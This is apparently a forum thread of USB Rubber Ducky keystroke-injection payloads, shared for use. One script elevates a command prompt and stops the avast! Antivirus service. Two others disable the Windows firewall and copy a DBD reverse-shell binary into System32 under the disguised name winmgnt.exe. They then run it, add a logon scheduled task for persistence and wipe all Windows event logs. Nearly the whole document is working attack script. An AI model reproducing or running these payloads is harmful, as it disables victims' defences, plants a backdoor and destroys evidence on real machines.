buzbee


  1. Not much to be said here. Stops avast! Antivirus shields to allow the payload to fully execute. Could very easily be modified to stop any running services by name.

     DELAY 15000
     REM This script will use an elevated command prompt to stop a service.
     REM I personally use this script to stop avast! Antivirus so I can execute the rest of my payload.
     GUI d
     DELAY 500
     GUI r
     DELAY 500
     STRING powershell Start-Process cmd.exe -Verb runAs
     ENTER
     DELAY 3000
     ALT y
     DELAY 500
     STRING net stop "avast! Antivirus"
     ENTER
     DELAY 1000
     LEFTARROW
     LEFTARROW
     LEFTARROW
     DELAY 500
     ENTER
     DELAY 1000
     STRING exit
     ENTER

     The end lines are for confirmation that you want avast shields to be shut down. If using this to stop another service, please comment out the following lines or change them to what is needed.

     LEFTARROW
     LEFTARROW
     LEFTARROW
     DELAY 500
     ENTER

     That is all, thanks for looking at my script!
  2. First post, here it goes. I love the idea of the simple-ducky payload generator; I, however, do not love the idea of using powershell to download the dbd reverse shell from a webserver, it's sloppy and unpredictable. Solution - copy and launch DBD from a twin duck flashed ducky! First you will need to create your dbd executable. Now navigate to /var/www/ on your linux box and rename winmgnt.txt to winmgnt.exe, then copy this to the root of your ducky sd card. Now for the script: I have included 2 scripts, one for a box with admin rights, the other for standard user rights.

     REM *** DBD no downloading with powershell - ADMIN Access ***
     REM *** CMD with UAC Bypass ***
     DELAY 10000
     WINDOWS r
     DELAY 200
     STRING powershell Start-Process cmd.exe -Verb runAs
     ENTER
     DELAY 3000
     ALT y
     DELAY 500
     REM *** Minimize CMD Windows ***
     ENTER
     ENTER
     ALT SPACE
     DELAY 300
     STRING M
     DELAY 200
     DOWNARROW
     REPEAT 100
     ENTER
     ENTER
     STRING netsh firewall set opmode disable
     ENTER
     DELAY 300
     REM *** Define DUCKY drive as %duck%
     STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d
     ENTER
     DELAY 500
     REM *** Copy DBD from Duck to HDD and execute DBD ***
     STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe
     ENTER
     DELAY 600
     STRING %WINDIR%\System32\winmgnt.exe
     ENTER
     DELAY 200
     STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe"
     ENTER
     REM *** Clear logs and exit CMD ***
     ENTER
     STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
     ENTER
     DELAY 2000
     ENTER
     ENTER
     STRING exit
     ENTER

     REM *** DBD no downloading with powershell - Standard User Access ***
     REM *** CMD ***
     DELAY 10000
     WINDOWS r
     DELAY 200
     STRING cmd.exe
     ENTER
     DELAY 3000
     ALT y
     DELAY 500
     REM *** Minimize CMD Windows ***
     ENTER
     ENTER
     ALT SPACE
     DELAY 300
     STRING M
     DELAY 200
     DOWNARROW
     REPEAT 100
     ENTER
     ENTER
     DELAY 300
     REM *** Define DUCKY drive as %duck%
     STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d
     ENTER
     DELAY 500
     REM *** Copy DBD from Duck to HDD and execute DBD ***
     STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe
     ENTER
     DELAY 600
     STRING %WINDIR%\System32\winmgnt.exe
     ENTER
     DELAY 200
     STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe"
     ENTER
     REM *** Clear logs and exit CMD ***
     ENTER
     STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
     ENTER
     DELAY 2000
     ENTER
     ENTER
     STRING exit
     ENTER

     Hope you enjoy these scripts; if anything is wrong with them, please let me know so I can fix them locally.

     NOTE - The volume label of the sd card should be "DBD" to work with the script, but if you know what you're doing, change that to whatever you want.